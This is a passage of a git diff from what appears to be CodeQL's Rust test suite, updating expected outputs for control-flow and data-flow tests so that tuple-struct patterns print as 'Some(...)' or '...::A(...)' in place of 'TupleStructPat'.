... = ... else {...} | gen_let_stmt.rs:10:9:10:15 | Some(...) | diff --git a/rust/ql/test/extractor-tests/generated/MatchArm/MatchArm_getPat.expected b/rust/ql/test/extractor-tests/generated/MatchArm/MatchArm_getPat.expected index 9928555fc32..d4adba7f838 100644 --- a/rust/ql/test/extractor-tests/generated/MatchArm/MatchArm_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/MatchArm/MatchArm_getPat.expected 
@@ -1,4 +1,4 @@ -| gen_match_arm.rs:6:9:6:29 | ... => y | gen_match_arm.rs:6:9:6:23 | TupleStructPat | +| gen_match_arm.rs:6:9:6:29 | ... => y | gen_match_arm.rs:6:9:6:23 | ...::Some(...) | | gen_match_arm.rs:7:9:7:26 | ...::None => 0 | gen_match_arm.rs:7:9:7:20 | ...::None | -| gen_match_arm.rs:10:9:10:35 | ... if ... => ... | gen_match_arm.rs:10:9:10:15 | TupleStructPat | +| gen_match_arm.rs:10:9:10:35 | ... if ... => ... | gen_match_arm.rs:10:9:10:15 | Some(...) | | gen_match_arm.rs:11:9:11:15 | _ => 0 | gen_match_arm.rs:11:9:11:9 | _ | diff --git a/rust/ql/test/extractor-tests/generated/OrPat/OrPat_getPat.expected b/rust/ql/test/extractor-tests/generated/OrPat/OrPat_getPat.expected index 22ebce5dde5..9e50c27e035 100644 --- a/rust/ql/test/extractor-tests/generated/OrPat/OrPat_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/OrPat/OrPat_getPat.expected @@ -1,2 +1,2 @@ -| gen_or_pat.rs:6:9:6:38 | ... \| ...::None | 0 | gen_or_pat.rs:6:9:6:23 | TupleStructPat | +| gen_or_pat.rs:6:9:6:38 | ... \| ...::None | 0 | gen_or_pat.rs:6:9:6:23 | ...::Some(...) | | gen_or_pat.rs:6:9:6:38 | ... \| ...::None | 1 | gen_or_pat.rs:6:27:6:38 | ...::None | diff --git a/rust/ql/test/extractor-tests/generated/RefPat/RefPat_getPat.expected b/rust/ql/test/extractor-tests/generated/RefPat/RefPat_getPat.expected index d4f78daeb82..029fd9fa172 100644 --- a/rust/ql/test/extractor-tests/generated/RefPat/RefPat_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/RefPat/RefPat_getPat.expected @@ -1,2 +1,2 @@ -| gen_ref_pat.rs:6:9:6:28 | &mut ... | gen_ref_pat.rs:6:14:6:28 | TupleStructPat | +| gen_ref_pat.rs:6:9:6:28 | &mut ... | gen_ref_pat.rs:6:14:6:28 | ...::Some(...) | | gen_ref_pat.rs:7:9:7:21 | &...::None | gen_ref_pat.rs:7:10:7:21 | ...::None | diff --git a/rust/ql/test/library-tests/controlflow-unstable/Cfg.expected b/rust/ql/test/library-tests/controlflow-unstable/Cfg.expected index 4260e2384c8..7a7d9884f19 100644 
--- a/rust/ql/test/library-tests/controlflow-unstable/Cfg.expected +++ b/rust/ql/test/library-tests/controlflow-unstable/Cfg.expected @@ -14,10 +14,10 @@ edges | test.rs:6:12:6:31 | [boolean(false)] ... && ... | test.rs:9:13:9:17 | false | false | | test.rs:6:12:6:31 | [boolean(true)] ... && ... | test.rs:7:13:7:13 | d | true | | test.rs:6:17:6:31 | let ... = b | test.rs:6:31:6:31 | b | | -| test.rs:6:21:6:27 | TupleStructPat | test.rs:6:12:6:31 | [boolean(false)] ... && ... | no-match | -| test.rs:6:21:6:27 | TupleStructPat | test.rs:6:26:6:26 | d | match | +| test.rs:6:21:6:27 | Some(...) | test.rs:6:12:6:31 | [boolean(false)] ... && ... | no-match | +| test.rs:6:21:6:27 | Some(...) | test.rs:6:26:6:26 | d | match | | test.rs:6:26:6:26 | d | test.rs:6:12:6:31 | [boolean(true)] ... && ... | match | -| test.rs:6:31:6:31 | b | test.rs:6:21:6:27 | TupleStructPat | | +| test.rs:6:31:6:31 | b | test.rs:6:21:6:27 | Some(...) | | | test.rs:6:33:8:9 | { ... } | test.rs:6:9:10:9 | if ... {...} else {...} | | | test.rs:7:13:7:13 | d | test.rs:6:33:8:9 | { ... } | | | test.rs:8:16:10:9 | { ... } | test.rs:6:9:10:9 | if ... {...} else {...} | | diff --git a/rust/ql/test/library-tests/controlflow/Cfg.expected b/rust/ql/test/library-tests/controlflow/Cfg.expected index 5137e2f8b89..3165b2354be 100644 --- a/rust/ql/test/library-tests/controlflow/Cfg.expected +++ b/rust/ql/test/library-tests/controlflow/Cfg.expected 
@@ -191,11 +191,11 @@ edges | test.rs:98:27:98:28 | 10 | test.rs:98:24:98:28 | 1..10 | | | test.rs:99:9:103:9 | while ... { ... } | test.rs:97:25:104:5 | { ... } | | | test.rs:99:15:99:39 | let ... = ... | test.rs:99:29:99:32 | iter | | -| test.rs:99:19:99:25 | TupleStructPat | test.rs:99:9:103:9 | while ... { ... } | no-match | -| test.rs:99:19:99:25 | TupleStructPat | test.rs:99:24:99:24 | x | match | +| test.rs:99:19:99:25 | Some(...) | test.rs:99:9:103:9 | while ... { ... } | no-match | +| test.rs:99:19:99:25 | Some(...) | test.rs:99:24:99:24 | x | match | | test.rs:99:24:99:24 | x | test.rs:100:17:100:17 | x | match | | test.rs:99:29:99:32 | iter | test.rs:99:29:99:39 | ... .next(...) | | -| test.rs:99:29:99:39 | ... .next(...) | test.rs:99:19:99:25 | TupleStructPat | | +| test.rs:99:29:99:39 | ... .next(...) | test.rs:99:19:99:25 | Some(...) | | | test.rs:99:41:103:9 | { ... } | test.rs:99:15:99:39 | let ... = ... | | | test.rs:100:13:102:13 | if ... {...} | test.rs:99:41:103:9 | { ... } | | | test.rs:100:17:100:17 | x | test.rs:100:22:100:22 | 5 | | 
@@ -274,10 +274,10 @@ edges | test.rs:137:48:143:5 | { ... } | test.rs:137:5:143:5 | exit fn test_if_let_else (normal) | | | test.rs:138:9:142:9 | if ... {...} else {...} | test.rs:137:48:143:5 | { ... } | | | test.rs:138:12:138:26 | let ... = a | test.rs:138:26:138:26 | a | | -| test.rs:138:16:138:22 | TupleStructPat | test.rs:138:21:138:21 | n | match | -| test.rs:138:16:138:22 | TupleStructPat | test.rs:141:13:141:13 | 0 | no-match | +| test.rs:138:16:138:22 | Some(...) | test.rs:138:21:138:21 | n | match | +| test.rs:138:16:138:22 | Some(...) | test.rs:141:13:141:13 | 0 | no-match | | test.rs:138:21:138:21 | n | test.rs:139:13:139:13 | n | match | -| test.rs:138:26:138:26 | a | test.rs:138:16:138:22 | TupleStructPat | | +| test.rs:138:26:138:26 | a | test.rs:138:16:138:22 | Some(...) | | | test.rs:138:28:140:9 | { ... } | test.rs:138:9:142:9 | if ... {...} else {...} | | | test.rs:139:13:139:13 | n | test.rs:138:28:140:9 | { ... } | | | test.rs:140:16:142:9 | { ... } | test.rs:138:9:142:9 | if ... {...} else {...} | | 
@@ -290,10 +290,10 @@ edges | test.rs:146:9:148:9 | ExprStmt | test.rs:146:12:146:26 | let ... = a | | | test.rs:146:9:148:9 | if ... {...} | test.rs:149:9:149:9 | 0 | | | test.rs:146:12:146:26 | let ... = a | test.rs:146:26:146:26 | a | | -| test.rs:146:16:146:22 | TupleStructPat | test.rs:146:9:148:9 | if ... {...} | no-match | -| test.rs:146:16:146:22 | TupleStructPat | test.rs:146:21:146:21 | n | match | +| test.rs:146:16:146:22 | Some(...) | test.rs:146:9:148:9 | if ... {...} | no-match | +| test.rs:146:16:146:22 | Some(...) | test.rs:146:21:146:21 | n | match | | test.rs:146:21:146:21 | n | test.rs:147:13:147:21 | ExprStmt | match | -| test.rs:146:26:146:26 | a | test.rs:146:16:146:22 | TupleStructPat | | +| test.rs:146:26:146:26 | a | test.rs:146:16:146:22 | Some(...) | | | test.rs:147:13:147:20 | return n | test.rs:145:5:150:5 | exit fn test_if_let (normal) | return | | test.rs:147:13:147:21 | ExprStmt | test.rs:147:20:147:20 | n | | | test.rs:147:20:147:20 | n | test.rs:147:13:147:20 | return n | | 
@@ -663,19 +663,19 @@ edges | test.rs:307:19:307:42 | ...: Option::<...> | test.rs:308:15:308:25 | maybe_digit | | | test.rs:307:52:313:5 | { ... } | test.rs:307:5:313:5 | exit fn test_match (normal) | | | test.rs:308:9:312:9 | match maybe_digit { ... } | test.rs:307:52:313:5 | { ... } | | -| test.rs:308:15:308:25 | maybe_digit | test.rs:309:13:309:27 | TupleStructPat | | -| test.rs:309:13:309:27 | TupleStructPat | test.rs:309:26:309:26 | x | match | -| test.rs:309:13:309:27 | TupleStructPat | test.rs:310:13:310:27 | TupleStructPat | no-match | +| test.rs:308:15:308:25 | maybe_digit | test.rs:309:13:309:27 | ...::Some(...) | | +| test.rs:309:13:309:27 | ...::Some(...) | test.rs:309:26:309:26 | x | match | +| test.rs:309:13:309:27 | ...::Some(...) | test.rs:310:13:310:27 | ...::Some(...) | no-match | | test.rs:309:26:309:26 | x | test.rs:309:32:309:32 | x | match | | test.rs:309:32:309:32 | x | test.rs:309:36:309:37 | 10 | | | test.rs:309:32:309:37 | ... < ... | test.rs:309:42:309:42 | x | true | -| test.rs:309:32:309:37 | ... < ... | test.rs:310:13:310:27 | TupleStructPat | false | +| test.rs:309:32:309:37 | ... < ... | test.rs:310:13:310:27 | ...::Some(...) | false | | test.rs:309:36:309:37 | 10 | test.rs:309:32:309:37 | ... < ... | | | test.rs:309:42:309:42 | x | test.rs:309:46:309:46 | 5 | | | test.rs:309:42:309:46 | ... + ... | test.rs:308:9:312:9 | match maybe_digit { ... } | | | test.rs:309:46:309:46 | 5 | test.rs:309:42:309:46 | ... + ... | | -| test.rs:310:13:310:27 | TupleStructPat | test.rs:310:26:310:26 | x | match | -| test.rs:310:13:310:27 | TupleStructPat | test.rs:311:13:311:24 | ...::None | no-match | +| test.rs:310:13:310:27 | ...::Some(...) | test.rs:310:26:310:26 | x | match | +| test.rs:310:13:310:27 | ...::Some(...) | test.rs:311:13:311:24 | ...::None | no-match | | test.rs:310:26:310:26 | x | test.rs:310:32:310:32 | x | match | | test.rs:310:32:310:32 | x | test.rs:308:9:312:9 | match maybe_digit { ... 
} | | | test.rs:311:13:311:24 | ...::None | test.rs:311:29:311:29 | 5 | match | @@ -686,7 +686,7 @@ edges | test.rs:315:44:315:67 | ...: Option::<...> | test.rs:316:19:316:29 | maybe_digit | | | test.rs:315:77:324:5 | { ... } | test.rs:315:5:324:5 | exit fn test_match_with_return_in_scrutinee (normal) | | | test.rs:316:9:323:9 | match ... { ... } | test.rs:315:77:324:5 | { ... } | | -| test.rs:316:16:320:9 | if ... {...} else {...} | test.rs:321:13:321:27 | TupleStructPat | | +| test.rs:316:16:320:9 | if ... {...} else {...} | test.rs:321:13:321:27 | ...::Some(...) | | | test.rs:316:19:316:29 | maybe_digit | test.rs:316:34:316:37 | Some | | | test.rs:316:19:316:40 | ... == ... | test.rs:317:13:317:21 | ExprStmt | true | | test.rs:316:19:316:40 | ... == ... | test.rs:319:13:319:23 | maybe_digit | false | @@ -698,8 +698,8 @@ edges | test.rs:317:20:317:20 | 3 | test.rs:317:13:317:20 | return 3 | | | test.rs:318:16:320:9 | { ... } | test.rs:316:16:320:9 | if ... {...} else {...} | | | test.rs:319:13:319:23 | maybe_digit | test.rs:318:16:320:9 | { ... } | | -| test.rs:321:13:321:27 | TupleStructPat | test.rs:321:26:321:26 | x | match | -| test.rs:321:13:321:27 | TupleStructPat | test.rs:322:13:322:24 | ...::None | no-match | +| test.rs:321:13:321:27 | ...::Some(...) | test.rs:321:26:321:26 | x | match | +| test.rs:321:13:321:27 | ...::Some(...) | test.rs:322:13:322:24 | ...::None | no-match | | test.rs:321:26:321:26 | x | test.rs:321:32:321:32 | x | match | | test.rs:321:32:321:32 | x | test.rs:321:36:321:36 | 5 | | | test.rs:321:32:321:36 | ... + ... | test.rs:316:9:323:9 | match ... { ... } | | 
@@ -716,9 +716,9 @@ edges | test.rs:327:9:330:18 | ... && ... | test.rs:326:60:331:5 | { ... } | | | test.rs:327:10:330:9 | [boolean(false)] match r { ... } | test.rs:327:9:330:18 | ... && ... | false | | test.rs:327:10:330:9 | [boolean(true)] match r { ... } | test.rs:330:15:330:18 | cond | true | -| test.rs:327:16:327:16 | r | test.rs:328:13:328:19 | TupleStructPat | | -| test.rs:328:13:328:19 | TupleStructPat | test.rs:328:18:328:18 | a | match | -| test.rs:328:13:328:19 | TupleStructPat | test.rs:329:13:329:13 | _ | no-match | +| test.rs:327:16:327:16 | r | test.rs:328:13:328:19 | Some(...) | | +| test.rs:328:13:328:19 | Some(...) | test.rs:328:18:328:18 | a | match | +| test.rs:328:13:328:19 | Some(...) | test.rs:329:13:329:13 | _ | no-match | | test.rs:328:18:328:18 | a | test.rs:328:24:328:24 | a | match | | test.rs:328:24:328:24 | a | test.rs:327:10:330:9 | [boolean(false)] match r { ... } | false | | test.rs:328:24:328:24 | a | test.rs:327:10:330:9 | [boolean(true)] match r { ... } | true | 
@@ -731,12 +731,12 @@ edges | test.rs:333:35:333:58 | ...: Result::<...> | test.rs:334:15:334:15 | r | | | test.rs:333:66:338:5 | { ... } | test.rs:333:5:338:5 | exit fn test_match_with_no_arms (normal) | | | test.rs:334:9:337:9 | match r { ... } | test.rs:333:66:338:5 | { ... } | | -| test.rs:334:15:334:15 | r | test.rs:335:13:335:21 | TupleStructPat | | -| test.rs:335:13:335:21 | TupleStructPat | test.rs:335:16:335:20 | value | match | -| test.rs:335:13:335:21 | TupleStructPat | test.rs:336:13:336:22 | TupleStructPat | no-match | +| test.rs:334:15:334:15 | r | test.rs:335:13:335:21 | Ok(...) | | +| test.rs:335:13:335:21 | Ok(...) | test.rs:335:16:335:20 | value | match | +| test.rs:335:13:335:21 | Ok(...) | test.rs:336:13:336:22 | Err(...) | no-match | | test.rs:335:16:335:20 | value | test.rs:335:26:335:30 | value | match | | test.rs:335:26:335:30 | value | test.rs:334:9:337:9 | match r { ... } | | -| test.rs:336:13:336:22 | TupleStructPat | test.rs:336:17:336:21 | never | match | +| test.rs:336:13:336:22 | Err(...) | test.rs:336:17:336:21 | never | match | | test.rs:336:17:336:21 | never | test.rs:336:33:336:37 | never | match | | test.rs:336:27:336:40 | match never { ... } | test.rs:334:9:337:9 | match r { ... } | | | test.rs:336:33:336:37 | never | test.rs:336:27:336:40 | match never { ... } | | 
@@ -746,10 +746,10 @@ edges | test.rs:343:23:343:36 | ...: Option::<...> | test.rs:344:9:344:57 | let ... = a else {...} | | | test.rs:343:46:346:5 | { ... } | test.rs:343:5:346:5 | exit fn test_let_match (normal) | | | test.rs:344:9:344:57 | let ... = a else {...} | test.rs:344:23:344:23 | a | | -| test.rs:344:13:344:19 | TupleStructPat | test.rs:344:18:344:18 | n | match | -| test.rs:344:13:344:19 | TupleStructPat | test.rs:344:39:344:53 | MacroStmts | no-match | +| test.rs:344:13:344:19 | Some(...) | test.rs:344:18:344:18 | n | match | +| test.rs:344:13:344:19 | Some(...) | test.rs:344:39:344:53 | MacroStmts | no-match | | test.rs:344:18:344:18 | n | test.rs:345:9:345:9 | n | match | -| test.rs:344:23:344:23 | a | test.rs:344:13:344:19 | TupleStructPat | | +| test.rs:344:23:344:23 | a | test.rs:344:13:344:19 | Some(...) | | | test.rs:344:32:344:54 | ...::panic_fmt | test.rs:344:39:344:53 | "Expected some" | | | test.rs:344:32:344:54 | MacroExpr | test.rs:344:30:344:56 | { ... } | | | test.rs:344:39:344:53 | "Expected some" | test.rs:344:39:344:53 | FormatArgsExpr | | 
@@ -770,9 +770,9 @@ edges | test.rs:349:9:352:10 | let ... = ... | test.rs:349:25:349:25 | m | | | test.rs:349:13:349:15 | ret | test.rs:353:9:353:12 | true | match | | test.rs:349:19:352:9 | match m { ... } | test.rs:349:13:349:15 | ret | | -| test.rs:349:25:349:25 | m | test.rs:350:13:350:21 | TupleStructPat | | -| test.rs:350:13:350:21 | TupleStructPat | test.rs:350:18:350:20 | ret | match | -| test.rs:350:13:350:21 | TupleStructPat | test.rs:351:13:351:16 | None | no-match | +| test.rs:349:25:349:25 | m | test.rs:350:13:350:21 | Some(...) | | +| test.rs:350:13:350:21 | Some(...) | test.rs:350:18:350:20 | ret | match | +| test.rs:350:13:350:21 | Some(...) | test.rs:351:13:351:16 | None | no-match | | test.rs:350:18:350:20 | ret | test.rs:350:26:350:28 | ret | match | | test.rs:350:26:350:28 | ret | test.rs:349:19:352:9 | match m { ... } | | | test.rs:351:13:351:16 | None | test.rs:351:28:351:32 | false | match | @@ -1030,10 +1030,10 @@ edges | test.rs:484:13:484:13 | x | test.rs:485:9:487:10 | let ... = x else {...} | match | | test.rs:484:30:484:33 | None | test.rs:484:13:484:13 | x | | | test.rs:485:9:487:10 | let ... = x else {...} | test.rs:485:23:485:23 | x | | -| test.rs:485:13:485:19 | TupleStructPat | test.rs:485:18:485:18 | y | match | -| test.rs:485:13:485:19 | TupleStructPat | test.rs:486:13:486:27 | ExprStmt | no-match | +| test.rs:485:13:485:19 | Some(...) | test.rs:485:18:485:18 | y | match | +| test.rs:485:13:485:19 | Some(...) | test.rs:486:13:486:27 | ExprStmt | no-match | | test.rs:485:18:485:18 | y | test.rs:488:9:488:9 | 0 | match | -| test.rs:485:23:485:23 | x | test.rs:485:13:485:19 | TupleStructPat | | +| test.rs:485:23:485:23 | x | test.rs:485:13:485:19 | Some(...) | | | test.rs:486:13:486:26 | break ''block 1 | test.rs:483:18:489:5 | 'block: { ... } | break | | test.rs:486:13:486:27 | ExprStmt | test.rs:486:26:486:26 | 1 | | | test.rs:486:26:486:26 | 1 | test.rs:486:13:486:26 | break ''block 1 | | 
diff --git a/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected b/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected index a49da751679..a6ecc87bebe 100644 --- a/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected +++ b/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected @@ -34,7 +34,7 @@ localStep | main.rs:32:9:32:9 | [SSA] b | main.rs:36:10:36:10 | b | | main.rs:32:9:32:9 | b | main.rs:32:9:32:9 | [SSA] b | | main.rs:32:13:35:5 | match m { ... } | main.rs:32:9:32:9 | b | -| main.rs:32:19:32:19 | m | main.rs:33:9:33:15 | TupleStructPat | +| main.rs:32:19:32:19 | m | main.rs:33:9:33:15 | Some(...) | | main.rs:32:19:32:19 | m | main.rs:34:9:34:12 | None | | main.rs:33:20:33:20 | a | main.rs:32:13:35:5 | match m { ... } | | main.rs:34:17:34:17 | 0 | main.rs:32:13:35:5 | match m { ... } | @@ -82,14 +82,14 @@ localStep | main.rs:105:9:105:10 | [SSA] s2 | main.rs:110:11:110:12 | s2 | | main.rs:105:9:105:10 | s2 | main.rs:105:9:105:10 | [SSA] s2 | | main.rs:105:14:105:28 | ...::Some(...) | main.rs:105:9:105:10 | s2 | -| main.rs:106:11:106:12 | s1 | main.rs:107:9:107:23 | TupleStructPat | +| main.rs:106:11:106:12 | s1 | main.rs:107:9:107:23 | ...::Some(...) | | main.rs:106:11:106:12 | s1 | main.rs:108:9:108:20 | ...::None | | main.rs:107:22:107:22 | [SSA] n | main.rs:107:33:107:33 | n | | main.rs:107:22:107:22 | n | main.rs:107:22:107:22 | [SSA] n | | main.rs:107:28:107:34 | sink(...) | main.rs:106:5:109:5 | match s1 { ... } | | main.rs:108:25:108:31 | sink(...) | main.rs:106:5:109:5 | match s1 { ... } | | main.rs:110:5:113:5 | match s2 { ... } | main.rs:103:37:114:1 | { ... } | -| main.rs:110:11:110:12 | s2 | main.rs:111:9:111:23 | TupleStructPat | +| main.rs:110:11:110:12 | s2 | main.rs:111:9:111:23 | ...::Some(...) | | main.rs:110:11:110:12 | s2 | main.rs:112:9:112:20 | ...::None | | main.rs:111:22:111:22 | [SSA] n | main.rs:111:33:111:33 | n | | main.rs:111:22:111:22 | n | main.rs:111:22:111:22 | [SSA] n | 
@@ -101,14 +101,14 @@ localStep | main.rs:118:9:118:10 | [SSA] s2 | main.rs:123:11:123:12 | s2 | | main.rs:118:9:118:10 | s2 | main.rs:118:9:118:10 | [SSA] s2 | | main.rs:118:14:118:20 | Some(...) | main.rs:118:9:118:10 | s2 | -| main.rs:119:11:119:12 | s1 | main.rs:120:9:120:15 | TupleStructPat | +| main.rs:119:11:119:12 | s1 | main.rs:120:9:120:15 | Some(...) | | main.rs:119:11:119:12 | s1 | main.rs:121:9:121:12 | None | | main.rs:120:14:120:14 | [SSA] n | main.rs:120:25:120:25 | n | | main.rs:120:14:120:14 | n | main.rs:120:14:120:14 | [SSA] n | | main.rs:120:20:120:26 | sink(...) | main.rs:119:5:122:5 | match s1 { ... } | | main.rs:121:17:121:23 | sink(...) | main.rs:119:5:122:5 | match s1 { ... } | | main.rs:123:5:126:5 | match s2 { ... } | main.rs:116:39:127:1 | { ... } | -| main.rs:123:11:123:12 | s2 | main.rs:124:9:124:15 | TupleStructPat | +| main.rs:123:11:123:12 | s2 | main.rs:124:9:124:15 | Some(...) | | main.rs:123:11:123:12 | s2 | main.rs:125:9:125:12 | None | | main.rs:124:14:124:14 | [SSA] n | main.rs:124:25:124:25 | n | | main.rs:124:14:124:14 | n | main.rs:124:14:124:14 | [SSA] n | @@ -120,8 +120,8 @@ localStep | main.rs:136:9:136:10 | [SSA] s2 | main.rs:144:11:144:12 | s2 | | main.rs:136:9:136:10 | s2 | main.rs:136:9:136:10 | [SSA] s2 | | main.rs:136:14:136:30 | ...::B(...) | main.rs:136:9:136:10 | s2 | -| main.rs:137:11:137:12 | s1 | main.rs:138:9:138:25 | TupleStructPat | -| main.rs:137:11:137:12 | s1 | main.rs:139:9:139:25 | TupleStructPat | +| main.rs:137:11:137:12 | s1 | main.rs:138:9:138:25 | ...::A(...) | +| main.rs:137:11:137:12 | s1 | main.rs:139:9:139:25 | ...::B(...) | | main.rs:137:11:137:12 | s1 | main.rs:141:11:141:12 | s1 | | main.rs:138:24:138:24 | [SSA] n | main.rs:138:35:138:35 | n | | main.rs:138:24:138:24 | n | main.rs:138:24:138:24 | [SSA] n | 
@@ -130,8 +130,8 @@ localStep | main.rs:139:24:139:24 | n | main.rs:139:24:139:24 | [SSA] n | | main.rs:139:30:139:36 | sink(...) | main.rs:137:5:140:5 | match s1 { ... } | | main.rs:141:11:141:12 | s1 | main.rs:142:10:142:46 | ... \| ... | -| main.rs:142:10:142:46 | ... \| ... | main.rs:142:10:142:26 | TupleStructPat | -| main.rs:142:10:142:46 | ... \| ... | main.rs:142:30:142:46 | TupleStructPat | +| main.rs:142:10:142:46 | ... \| ... | main.rs:142:10:142:26 | ...::A(...) | +| main.rs:142:10:142:46 | ... \| ... | main.rs:142:30:142:46 | ...::B(...) | | main.rs:142:10:142:46 | [SSA] [match(true)] phi | main.rs:142:57:142:57 | n | | main.rs:142:25:142:25 | [SSA] [input] [match(true)] phi | main.rs:142:10:142:46 | [SSA] [match(true)] phi | | main.rs:142:25:142:25 | [SSA] n | main.rs:142:25:142:25 | [SSA] [input] [match(true)] phi | @@ -141,8 +141,8 @@ localStep | main.rs:142:45:142:45 | n | main.rs:142:45:142:45 | [SSA] n | | main.rs:142:52:142:58 | sink(...) | main.rs:141:5:143:5 | match s1 { ... } | | main.rs:144:5:147:5 | match s2 { ... } | main.rs:134:48:148:1 | { ... } | -| main.rs:144:11:144:12 | s2 | main.rs:145:9:145:25 | TupleStructPat | -| main.rs:144:11:144:12 | s2 | main.rs:146:9:146:25 | TupleStructPat | +| main.rs:144:11:144:12 | s2 | main.rs:145:9:145:25 | ...::A(...) | +| main.rs:144:11:144:12 | s2 | main.rs:146:9:146:25 | ...::B(...) | | main.rs:145:24:145:24 | [SSA] n | main.rs:145:35:145:35 | n | | main.rs:145:24:145:24 | n | main.rs:145:24:145:24 | [SSA] n | | main.rs:145:30:145:36 | sink(...) | main.rs:144:5:147:5 | match s2 { ... } | 
@@ -155,8 +155,8 @@ localStep | main.rs:154:9:154:10 | [SSA] s2 | main.rs:162:11:162:12 | s2 | | main.rs:154:9:154:10 | s2 | main.rs:154:9:154:10 | [SSA] s2 | | main.rs:154:14:154:17 | B(...) | main.rs:154:9:154:10 | s2 | -| main.rs:155:11:155:12 | s1 | main.rs:156:9:156:12 | TupleStructPat | -| main.rs:155:11:155:12 | s1 | main.rs:157:9:157:12 | TupleStructPat | +| main.rs:155:11:155:12 | s1 | main.rs:156:9:156:12 | A(...) | +| main.rs:155:11:155:12 | s1 | main.rs:157:9:157:12 | B(...) | | main.rs:155:11:155:12 | s1 | main.rs:159:11:159:12 | s1 | | main.rs:156:11:156:11 | [SSA] n | main.rs:156:22:156:22 | n | | main.rs:156:11:156:11 | n | main.rs:156:11:156:11 | [SSA] n | @@ -165,8 +165,8 @@ localStep | main.rs:157:11:157:11 | n | main.rs:157:11:157:11 | [SSA] n | | main.rs:157:17:157:23 | sink(...) | main.rs:155:5:158:5 | match s1 { ... } | | main.rs:159:11:159:12 | s1 | main.rs:160:10:160:20 | ... \| ... | -| main.rs:160:10:160:20 | ... \| ... | main.rs:160:10:160:13 | TupleStructPat | -| main.rs:160:10:160:20 | ... \| ... | main.rs:160:17:160:20 | TupleStructPat | +| main.rs:160:10:160:20 | ... \| ... | main.rs:160:10:160:13 | A(...) | +| main.rs:160:10:160:20 | ... \| ... | main.rs:160:17:160:20 | B(...) | | main.rs:160:10:160:20 | [SSA] [match(true)] phi | main.rs:160:31:160:31 | n | | main.rs:160:12:160:12 | [SSA] [input] [match(true)] phi | main.rs:160:10:160:20 | [SSA] [match(true)] phi | | main.rs:160:12:160:12 | [SSA] n | main.rs:160:12:160:12 | [SSA] [input] [match(true)] phi | 
@@ -176,8 +176,8 @@ localStep | main.rs:160:19:160:19 | n | main.rs:160:19:160:19 | [SSA] n | | main.rs:160:26:160:32 | sink(...) | main.rs:159:5:161:5 | match s1 { ... } | | main.rs:162:5:165:5 | match s2 { ... } | main.rs:152:50:166:1 | { ... } | -| main.rs:162:11:162:12 | s2 | main.rs:163:9:163:12 | TupleStructPat | -| main.rs:162:11:162:12 | s2 | main.rs:164:9:164:12 | TupleStructPat | +| main.rs:162:11:162:12 | s2 | main.rs:163:9:163:12 | A(...) | +| main.rs:162:11:162:12 | s2 | main.rs:164:9:164:12 | B(...) | | main.rs:163:11:163:11 | [SSA] n | main.rs:163:22:163:22 | n | | main.rs:163:11:163:11 | n | main.rs:163:11:163:11 | [SSA] n | | main.rs:163:17:163:23 | sink(...) | main.rs:162:5:165:5 | match s2 { ... } | 
@@ -285,22 +285,38 @@ storeStep | main.rs:118:19:118:19 | 2 | Some | main.rs:118:14:118:20 | Some(...) | | main.rs:135:29:135:38 | source(...) | A | main.rs:135:14:135:39 | ...::A(...) | | main.rs:136:29:136:29 | 2 | B | main.rs:136:14:136:30 | ...::B(...) | +| main.rs:153:16:153:25 | source(...) | A | main.rs:153:14:153:26 | A(...) | +| main.rs:154:16:154:16 | 2 | B | main.rs:154:14:154:17 | B(...) | | main.rs:175:18:175:27 | source(...) | C | main.rs:174:14:176:5 | ...::C {...} | | main.rs:177:41:177:41 | 2 | D | main.rs:177:14:177:43 | ...::D {...} | +| main.rs:195:18:195:27 | source(...) | C | main.rs:194:14:196:5 | C {...} | +| main.rs:197:27:197:27 | 2 | D | main.rs:197:14:197:29 | D {...} | | main.rs:240:27:240:27 | 0 | Some | main.rs:240:22:240:28 | Some(...) | readStep -| main.rs:33:9:33:15 | TupleStructPat | Some | main.rs:33:14:33:14 | _ | -| main.rs:120:9:120:15 | TupleStructPat | Some | main.rs:120:14:120:14 | n | -| main.rs:124:9:124:15 | TupleStructPat | Some | main.rs:124:14:124:14 | n | -| main.rs:138:9:138:25 | TupleStructPat | A | main.rs:138:24:138:24 | n | -| main.rs:139:9:139:25 | TupleStructPat | B | main.rs:139:24:139:24 | n | -| main.rs:142:10:142:26 | TupleStructPat | A | main.rs:142:25:142:25 | n | -| main.rs:142:30:142:46 | TupleStructPat | B | main.rs:142:45:142:45 | n | -| main.rs:145:9:145:25 | TupleStructPat | A | main.rs:145:24:145:24 | n | -| main.rs:146:9:146:25 | TupleStructPat | B | main.rs:146:24:146:24 | n | +| main.rs:33:9:33:15 | Some(...) | Some | main.rs:33:14:33:14 | _ | +| main.rs:120:9:120:15 | Some(...) | Some | main.rs:120:14:120:14 | n | +| main.rs:124:9:124:15 | Some(...) | Some | main.rs:124:14:124:14 | n | +| main.rs:138:9:138:25 | ...::A(...) | A | main.rs:138:24:138:24 | n | +| main.rs:139:9:139:25 | ...::B(...) | B | main.rs:139:24:139:24 | n | +| main.rs:142:10:142:26 | ...::A(...) | A | main.rs:142:25:142:25 | n | +| main.rs:142:30:142:46 | ...::B(...) 
| B | main.rs:142:45:142:45 | n | +| main.rs:145:9:145:25 | ...::A(...) | A | main.rs:145:24:145:24 | n | +| main.rs:146:9:146:25 | ...::B(...) | B | main.rs:146:24:146:24 | n | +| main.rs:156:9:156:12 | A(...) | A | main.rs:156:11:156:11 | n | +| main.rs:157:9:157:12 | B(...) | B | main.rs:157:11:157:11 | n | +| main.rs:160:10:160:13 | A(...) | A | main.rs:160:12:160:12 | n | +| main.rs:160:17:160:20 | B(...) | B | main.rs:160:19:160:19 | n | +| main.rs:163:9:163:12 | A(...) | A | main.rs:163:11:163:11 | n | +| main.rs:164:9:164:12 | B(...) | B | main.rs:164:11:164:11 | n | | main.rs:179:9:179:38 | ...::C {...} | C | main.rs:179:36:179:36 | n | | main.rs:180:9:180:38 | ...::D {...} | D | main.rs:180:36:180:36 | n | | main.rs:183:10:183:39 | ...::C {...} | C | main.rs:183:37:183:37 | n | | main.rs:183:43:183:72 | ...::D {...} | D | main.rs:183:70:183:70 | n | | main.rs:186:9:186:38 | ...::C {...} | C | main.rs:186:36:186:36 | n | | main.rs:187:9:187:38 | ...::D {...} | D | main.rs:187:36:187:36 | n | +| main.rs:199:9:199:24 | C {...} | C | main.rs:199:22:199:22 | n | +| main.rs:200:9:200:24 | D {...} | D | 